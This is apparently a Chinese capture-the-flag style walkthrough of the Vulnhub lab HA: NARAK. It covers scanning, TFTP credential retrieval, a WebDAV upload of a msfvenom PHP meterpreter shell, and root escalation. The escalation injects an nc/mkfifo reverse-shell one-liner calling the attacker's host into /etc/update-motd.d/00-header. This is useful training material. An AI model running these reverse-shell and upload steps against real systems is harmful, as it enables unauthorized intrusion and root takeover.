【JDICSP】第二十二期:HA: NARAK靶场记录

admin
admin
admin
102611
文章
87
评论
2020年11月10日12:15:21评论87 views字数 2069阅读6分53秒阅读模式

【JDICSP小分享第二十二期】 



前言:

Vulnhub是一个提供各种漏洞环境的靶场,每个镜像会有破解的目标,挑战的目标是通过网络闯入系统获取root权限和查看flag

说明:

这次选择的靶场名字为:HA: NARAK

靶场下载链接:https://download.vulnhub.com/ha/narak.ova

个人建议在vmware运行靶场环境,再使用kali或者终端机器作为攻击主机,同时要注意kali在同一网卡下,否则是无法进行通信的。

题目的描述为:

【JDICSP】第二十二期:HA: NARAK靶场记录

为了让更多新手朋友少走弯路,我尽量写详细一点,如果有什么不清楚的地方可以对我们发起提问

开始:

在这里我让kali和靶场都使用NAT模式

在编辑->虚拟网络编辑器处可以看到我们使用模式的配置。

【JDICSP】第二十二期:HA: NARAK靶场记录

【JDICSP】第二十二期:HA: NARAK靶场记录

Ip地址段都为192.168.158.*

目标主机:未知ip

 

既然知道ip段,不知道IP,我们可与使用nmap去扫描整个 c段来探测主机

使用命令:Nmap -sS -Pn 192.168.158.0/24

【JDICSP】第二十二期:HA: NARAK靶场记录

发现192.168.158.142开放了80和22

那我们所需要渗透的靶场就为192.168.158.142了

虽然使用 nmap -sS -Pn ip这个扫描会虽然速度很快,不过很多端口会扫描不出来

我们可以使用命令:nmap -T4 -A -v-p 1-65535 ip去详细对目标扫描一下

【JDICSP】第二十二期:HA: NARAK靶场记录

使用udp进行端口扫描,命令:nmap-sU -Pn 192.168.158.142

【JDICSP】第二十二期:HA: NARAK靶场记录

一共开放了4个端口,80端口的web,22端口的ssh,69的tftp和68的dhcpc

其中80开放http服务

我们先访问一下80吧

【JDICSP】第二十二期:HA: NARAK靶场记录

使用google的wappalyzer插件查看一下是否有框架信息

【JDICSP】第二十二期:HA: NARAK靶场记录

并没有得到网站开发的框架,但可以知道网站的apche的版本和ubuntu的操作系统

这时我们可以对目标进行目录扫描:

先使用dirscan进行扫描

【JDICSP】第二十二期:HA: NARAK靶场记录

访问/webdav

【JDICSP】第二十二期:HA: NARAK靶场记录

由于我们没有账号信息,想要爆破起来比较困难,我们对目标继续信息收集。

使用7kbscan对目标扫描其他的扩展

最终在找到一个txt文件

【JDICSP】第二十二期:HA: NARAK靶场记录

访问一下

【JDICSP】第二十二期:HA: NARAK靶场记录

提示我们关键的文件在creds.txt里

看来我们需要找到creads.txt文件,但是扫描都没发现这个文件

猜测可能是存在tftp中的

我们开启一下tftp服务(控制面板->程序->启动或者关闭window功能)

【JDICSP】第二十二期:HA: NARAK靶场记录

使用cmd

【JDICSP】第二十二期:HA: NARAK靶场记录

使用命令:tftp -i 192.168.158.142 get creds.txt 果然存在

【JDICSP】第二十二期:HA: NARAK靶场记录

打开发现是一串base64

【JDICSP】第二十二期:HA: NARAK靶场记录

解密一下

【JDICSP】第二十二期:HA: NARAK靶场记录

解密得到为:yamdoot:Swarg

这应该就是webdav的账号和密码了

【JDICSP】第二十二期:HA: NARAK靶场记录

成功连接

【JDICSP】第二十二期:HA: NARAK靶场记录

可以发现我们是可以通过webdav上传文件的

接着我们使用kali的cadaver去连接webdav

使用命令:cadaver http://192.168.158.142/webdav

【JDICSP】第二十二期:HA: NARAK靶场记录

由于这里是需要登录webdav所以我们需要上传能反弹shell的木马文件

这里使用kali生成一个msf的php马,命令:

msfvenom -pphp/meterpreter_reverse_tcp LHOST=xxx LPORT=xxx -f raw > shell.php

kali进行监听

命令:

use exploit/multi/handler

set payloadphp/meterpreter_reverse_tcp

php/meterpreter_reverse_tcp

set lhost 192.168.158.132

192.168.158.132

set lport 8888

run

【JDICSP】第二十二期:HA: NARAK靶场记录


再上传生成的木马文件

【JDICSP】第二十二期:HA: NARAK靶场记录


访问msf.php

【JDICSP】第二十二期:HA: NARAK靶场记录


【JDICSP】第二十二期:HA: NARAK靶场记录



成功拿到meterperter

【JDICSP】第二十二期:HA: NARAK靶场记录

权限比较低

查看内核

【JDICSP】第二十二期:HA: NARAK靶场记录


使用searchsploit查看是否有可以提权的脚本

【JDICSP】第二十二期:HA: NARAK靶场记录


没有发现利用的脚本,看来提权得翻文件了

在/home/inferno目录中找到了user.txt

【JDICSP】第二十二期:HA: NARAK靶场记录

在home目录中可以发现还存在2个用户

我们还需要找到root.txt,这个文件估计需要我们提权了

【JDICSP】第二十二期:HA: NARAK靶场记录

Yamdoot应该是TFPT用户,narak我们访问不了,应该为高权限账号

继续翻文件

在/mnt目录发现一段密文

【JDICSP】第二十二期:HA: NARAK靶场记录

百度可以得到为brainfuck

使用brainfuck在线解密

【JDICSP】第二十二期:HA: NARAK靶场记录

得到chitragupt,感觉可能是某个账号的密码

我们对3个账号进行尝试

使用inferno/chitragupt登录成功

接着我们可以上传linpeas来查找可供我们提权的文件

【JDICSP】第二十二期:HA: NARAK靶场记录

/etc/motd欢迎界面 我们可以通过修改ssh登陆时的欢迎信息来反弹一个root的shell使用命令echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i2>&1|nc 192.168.158.132 1234 >/tmp/f" >>/etc/update-motd.d/00-header

【JDICSP】第二十二期:HA: NARAK靶场记录

接着kali使用nc监听

【JDICSP】第二十二期:HA: NARAK靶场记录

重新登录

Nc成功接收到root

【JDICSP】第二十二期:HA: NARAK靶场记录

最后cat ./root.txt得到最终的flag

【JDICSP】第二十二期:HA: NARAK靶场记录

总结:

Vulnhub还是挺有意思的,能够掌握很多渗透的技巧,我们后续我们会继续更新新的靶场文章,希望能给大家一点帮助。


本文始发于微信公众号(信安小屋):【JDICSP】第二十二期:HA: NARAK靶场记录

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2020年11月10日12:15:21
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【JDICSP】第二十二期:HA: NARAK靶场记录http://cn-sec.com/archives/182461.html

发表评论

匿名网友 填写信息